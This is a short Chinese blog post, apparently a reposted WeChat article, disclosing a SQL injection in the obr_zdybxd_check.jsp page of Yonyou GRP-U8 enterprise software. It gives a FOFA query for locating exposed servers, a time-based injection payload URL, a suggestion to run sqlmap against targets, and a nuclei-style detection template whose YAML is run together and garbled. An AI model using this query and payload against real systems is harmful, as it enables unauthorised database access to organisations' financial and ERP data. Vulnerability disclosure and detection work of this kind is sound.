请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
用友GRP-U8是一款由用友软件开发的企业级管理软件,也被称为用友U8。它是用友公司的核心产品之一,旨在帮助企业实现全面的信息化管理和运营。
用友GRP-U8提供了一系列功能模块,涵盖了企业资源规划(ERP)、财务会计、人力资源管理、供应链管理、生产制造、销售与客户关系管理等方面。它可以帮助企业集中管理和控制各个业务流程,提高工作效率、降低成本,并提供决策支持和业务分析等功能。
fofa语法:app="用友-GRP-U8"
POC:/u8qx/obr_zdybxd_check.jsp?mlid=1%27;WAITFOR%20DELAY%20%270:0:5%27--
然后使用sqlmap一把梭:
id: GRPU8_obr_zdybxd_check_injectioninfo:name: GRPU8_obr_zdybxd_check_injection: recjlseverity: highdescription: Detects delay injection vulnerabilities.tags:delay-injectiontype: dynamicrequests:method: GETpath:"/u8qx/obr_zdybxd_check.jsp?mlid=1';WAITFOR DELAY '0:0:5'--""/u8qx/obr_zdybxd_check.jsp?mlid=1';WAITFOR DELAY '0:0:10'--": ormatchers:type: latencycompare:operator: greater-thanvalue: 4s
原文始发于微信公众号(爱喝酒烫头的曹操):用友GRP U8 obr_zdybxd_check.jsp sql注入
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论